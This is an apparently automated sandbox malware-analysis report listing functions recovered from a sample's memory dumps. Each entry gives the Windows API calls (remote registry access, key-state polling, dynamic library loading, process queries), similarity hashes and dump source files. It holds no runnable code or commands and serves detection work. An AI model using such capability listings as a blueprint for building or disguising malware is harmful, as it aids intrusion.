                                                      • Opcode ID: 7363f8155d08a0369670c41f713d3b05178e32e4dce3af366430b8bdf2d252a6
                                                      • Instruction ID: 0f08788ffbdd30fc09680906b4f0c56855ae89438b83b3b107f175bece89faff
                                                      • Opcode Fuzzy Hash: 7363f8155d08a0369670c41f713d3b05178e32e4dce3af366430b8bdf2d252a6
                                                      • Instruction Fuzzy Hash: 9711AFB5600208BBDF10BFA0DD85FEA37BCEF58700F044075BA18AA193CA709A468B75
                                                      Function 00AC2017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00AC2048
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                      • API String ID: 3964851224-769500911
                                                      • Opcode ID: 5ee7322412aee63d00c2ec4a72879a1d2e23629ca604fa4e343b2e53c9461789
                                                      • Instruction ID: 70d2b50a5ab00e9006633a703f1684800157b42ea669b2515d7a3721f51c7fce
                                                      • Opcode Fuzzy Hash: 5ee7322412aee63d00c2ec4a72879a1d2e23629ca604fa4e343b2e53c9461789
                                                      • Instruction Fuzzy Hash: A5118B30940109DFCF40EFA4C980AFEB3B1FF16304B5084A9D851AB292EB326D0ACB40
                                                      Function 00ADEE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00ADEF1B
                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00ADEF4B
                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00ADF07E
                                                      • CloseHandle.KERNEL32(?), ref: 00ADF0FF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                      • String ID:
                                                      • API String ID: 2364364464-0
                                                      • Opcode ID: 4f053c08816524397f274236b907cc101058ef694dadf350f7a75f3510802fb6
                                                      • Instruction ID: b7bbc549b7450f48337dfb91acd405dd74247b72edda33b3fc7ab07f19b7ee0d
                                                      • Opcode Fuzzy Hash: 4f053c08816524397f274236b907cc101058ef694dadf350f7a75f3510802fb6
                                                      • Instruction Fuzzy Hash: 97815F716043019FD720EF28C986B6BB7E9EF48720F14891DF59ADB392DB71AC418B91
                                                      Function 00AE02C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                        • Part of subcall function 00AE10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AE0038,?,?), ref: 00AE10BC
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AE0388
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AE03C7
                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00AE040E
                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00AE043A
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00AE0447
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                      • String ID:
                                                      • API String ID: 3440857362-0
                                                      • Opcode ID: 0631063daaef03e5d31c9b3809c8100780c084662b95381f354a1db0d2671504
                                                      • Instruction ID: 230ff48acd70107fe206a1d61fba56191380d33c36f04aacfda3c82e15b66294
                                                      • Opcode Fuzzy Hash: 0631063daaef03e5d31c9b3809c8100780c084662b95381f354a1db0d2671504
                                                      • Instruction Fuzzy Hash: ED514A31208245AFDB04EF65C981E6EB7F8FF88704F44892DF5958B2A2DB70E945CB52
                                                      Function 00ADDBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A69997: __itow.LIBCMT ref: 00A699C2
                                                        • Part of subcall function 00A69997: __swprintf.LIBCMT ref: 00A69A0C
                                                      • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00ADDC3B
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00ADDCBE
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00ADDCDA
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00ADDD1B
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00ADDD35
                                                        • Part of subcall function 00A65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00AC7B20,?,?,00000000), ref: 00A65B8C
                                                        • Part of subcall function 00A65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00AC7B20,?,?,00000000,?,?), ref: 00A65BB0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 327935632-0
                                                      • Opcode ID: 52e927570455d03c2e767eb31bb508fb4f59cfcfd1050d996029e7bb709d4f78
                                                      • Instruction ID: c7c7958587b8643e0892bc36b91e3fff2f8aacfb2f8d9cc9bf42c0c740fd66b5
                                                      • Opcode Fuzzy Hash: 52e927570455d03c2e767eb31bb508fb4f59cfcfd1050d996029e7bb709d4f78
                                                      • Instruction Fuzzy Hash: 27511835A00609DFCB00EFA8C584DADB7F5FF58310B14806AE956AB321DB30AD45CB91
                                                      Function 00ACE7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00ACE88A
                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00ACE8B3
                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00ACE8F2
                                                        • Part of subcall function 00A69997: __itow.LIBCMT ref: 00A699C2
                                                        • Part of subcall function 00A69997: __swprintf.LIBCMT ref: 00A69A0C
                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00ACE917
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00ACE91F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 1389676194-0
                                                      • Opcode ID: e83b07cb190c26e193e431f21be91c68bc604790bcc0db8153430ca6c884226b
                                                      • Instruction ID: 0d5382d94e98fd30d79bf3e8e2beb6a5823316ca3ddafe9f788d7b145e0531b0
                                                      • Opcode Fuzzy Hash: e83b07cb190c26e193e431f21be91c68bc604790bcc0db8153430ca6c884226b
                                                      • Instruction Fuzzy Hash: B551FD35A00205DFCF05EF64C981AAEBBF9EF08314B1880A9E949AB361DB35ED51DB51
                                                      Function 00AEA2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4391da69d8612f6f2e9a77cc10fb5e85d70ba15dd4ff34f7f100eb4d70f71c81
                                                      • Instruction ID: cf8cbc7b84d4e89e405c91be23530329f7472cb6afb2e39dc2f83a520a15323b
                                                      • Opcode Fuzzy Hash: 4391da69d8612f6f2e9a77cc10fb5e85d70ba15dd4ff34f7f100eb4d70f71c81
                                                      • Instruction Fuzzy Hash: 79412639900285AFC720DF69CC88FA9BBB4FB29310F144165F856AB2E1D770BD41DB61
                                                      Function 00A62344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 00A62357
                                                      • ScreenToClient.USER32(00B267B0,?), ref: 00A62374
                                                      • GetAsyncKeyState.USER32(00000001), ref: 00A62399
                                                      • GetAsyncKeyState.USER32(00000002), ref: 00A623A7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: AsyncState$ClientCursorScreen
                                                      • String ID:
                                                      • API String ID: 4210589936-0
                                                      • Opcode ID: fb74653155a06165abf1c4c3f02791de9589a6ad45d64d8cfd48312d96bfd153
                                                      • Instruction ID: 033cdd400a4bf0fa06a1bc7c62ce0a229d1c15f5a65c2c176134172aff6819d1
                                                      • Opcode Fuzzy Hash: fb74653155a06165abf1c4c3f02791de9589a6ad45d64d8cfd48312d96bfd153
                                                      • Instruction Fuzzy Hash: A2419175604659FFDF159FA8C844BEDBBB4FB05360F20436AF8289A290C7349950DBA1
                                                      Function 00AB6920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AB695D
                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00AB69A9
                                                      • TranslateMessage.USER32(?), ref: 00AB69D2
                                                      • DispatchMessageW.USER32(?), ref: 00AB69DC
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AB69EB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                      • String ID:
                                                      • API String ID: 2108273632-0
                                                      • Opcode ID: cd37f783e4831f892ee75706e8045bc41ea62eae6fcc86e77a6026196559a21b
                                                      • Instruction ID: 1c24ba03c590932c445e261772547c1768b634997fdff908a2fc03dec04a1e59
                                                      • Opcode Fuzzy Hash: cd37f783e4831f892ee75706e8045bc41ea62eae6fcc86e77a6026196559a21b
                                                      • Instruction Fuzzy Hash: D231A171900286AFDB30CFB49C84BF67BBCAB15344F144569E421D71A2DB39D88ADBA0
                                                      Function 00AB8F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 00AB8F12
                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00AB8FBC
                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00AB8FC4
                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 00AB8FD2
                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00AB8FDA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessagePostSleep$RectWindow
                                                      • String ID:
                                                      • API String ID: 3382505437-0
                                                      • Opcode ID: aa3707c7d5a9e21da3b01f6691fe097a55b1d750425f8f36d023ab380ed4b053
                                                      • Instruction ID: 99b99a70a8f75db306998d09d67d6f4cb19201a47eb971fd617ae55fb7754adf
                                                      • Opcode Fuzzy Hash: aa3707c7d5a9e21da3b01f6691fe097a55b1d750425f8f36d023ab380ed4b053
                                                      • Instruction Fuzzy Hash: A231DC71500259EFDF00CFBCD988AEE7BBAEB44315F108229F925AA1D1C7B49914CB90
                                                      Function 00ABB6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 00ABB6C7
                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00ABB6E4
                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00ABB71C
                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00ABB742
                                                      • _wcsstr.LIBCMT ref: 00ABB74C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                      • String ID:
                                                      • API String ID: 3902887630-0
                                                      • Opcode ID: f6129c6e5b92ddd50610625ef44173809d36254fa0f0dc4da7eb9aec56cc6bf8
                                                      • Instruction ID: e0f6298d4b67ea394f7243fbc0f6cdabde56073f8bb27b8093e5ac2dafacb956
                                                      • Opcode Fuzzy Hash: f6129c6e5b92ddd50610625ef44173809d36254fa0f0dc4da7eb9aec56cc6bf8
                                                      • Instruction Fuzzy Hash: 0921D732605284BBEB25AB799D49EBB7BACDF85710F104079FC05CA1A2EFA1DC419760
                                                      Function 00AEB405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A62612: GetWindowLongW.USER32(?,000000EB), ref: 00A62623
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00AEB44C
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00AEB471
                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00AEB489
                                                      • GetSystemMetrics.USER32(00000004), ref: 00AEB4B2
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00AD1184,00000000), ref: 00AEB4D0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$MetricsSystem
                                                      • String ID:
                                                      • API String ID: 2294984445-0
                                                      • Opcode ID: 40f6aa74fc52273ab6fa27f90a3ec48f0d3167e18fa8fb746508ef9365930547
                                                      • Instruction ID: 7dcfb6b94b8155b3f476c3b76afc5a41a75bb72f5304eef7d1716827344ff6a0
                                                      • Opcode Fuzzy Hash: 40f6aa74fc52273ab6fa27f90a3ec48f0d3167e18fa8fb746508ef9365930547
                                                      • Instruction Fuzzy Hash: 572183715206A5AFCB209F79DC48A6B37A4FB05720F144739F926D71E1E7309911DBA0
                                                      Function 00AB97E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AB9802
                                                        • Part of subcall function 00A67D2C: _memmove.LIBCMT ref: 00A67D66
                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AB9834
                                                      • __itow.LIBCMT ref: 00AB984C
                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AB9874
                                                      • __itow.LIBCMT ref: 00AB9885
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$__itow$_memmove
                                                      • String ID:
                                                      • API String ID: 2983881199-0
                                                      • Opcode ID: 88437fdfe99387444b9d2b4b079b4804b5e7146a930506a486a0a13f525cabcd
                                                      • Instruction ID: 719e6b95505a1f19a5b0b1b8e387701aa45ca1e880a0911080c64b13b7517b57
                                                      • Opcode Fuzzy Hash: 88437fdfe99387444b9d2b4b079b4804b5e7146a930506a486a0a13f525cabcd
                                                      • Instruction Fuzzy Hash: C921B331A00284ABDB10ABA58D86EEF7BBDEF4A714F044025FA049B252D6718D458791
                                                      Function 00A612F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A6134D
                                                      • SelectObject.GDI32(?,00000000), ref: 00A6135C
                                                      • BeginPath.GDI32(?), ref: 00A61373
                                                      • SelectObject.GDI32(?,00000000), ref: 00A6139C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ObjectSelect$BeginCreatePath
                                                      • String ID:
                                                      • API String ID: 3225163088-0
                                                      • Opcode ID: 54ae8ebac213867973f20308482e43e9c98ff7d3e93e822a7fdd43f54217b27b
                                                      • Instruction ID: 247912b406c11e25ba9ce1dd1076e42cad97dd8fe1986b5c7da13fe4bd8afcb9
                                                      • Opcode Fuzzy Hash: 54ae8ebac213867973f20308482e43e9c98ff7d3e93e822a7fdd43f54217b27b
                                                      • Instruction Fuzzy Hash: 31217C70800308EFDB61CF65ED447A97BF8FB14321F188226F8119F2A0DB759992DB90
                                                      Function 00ABC161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      • Opcode ID: 4ba93524e1850e384bf8700e02a7ca4206d763d09c8278abf71dc3f002cf685e
                                                      • Instruction ID: e1f2eaab717cece91f0894a84b206b4c885f7235fe41e55c47cc4d4dec38eeb5
                                                      • Opcode Fuzzy Hash: 4ba93524e1850e384bf8700e02a7ca4206d763d09c8278abf71dc3f002cf685e
                                                      • Instruction Fuzzy Hash: 6E0152B160510A7BE204B6296D42FFBB75CAF613A4F444625FE04B6283F6519E1383A1
                                                      Function 00AC4D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00AC4D5C
                                                      • __beginthreadex.LIBCMT ref: 00AC4D7A
                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00AC4D8F
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00AC4DA5
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00AC4DAC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                      • String ID:
                                                      • API String ID: 3824534824-0
                                                      • Opcode ID: a03b8da5e6747138a1970dec03b98b2f6b1256698c9753e0dc33273ab6937981
                                                      • Instruction ID: 9d60200e677406259e142434f5fb75b994cdb0dc2ce7a0736e57b07fe2c5da3a
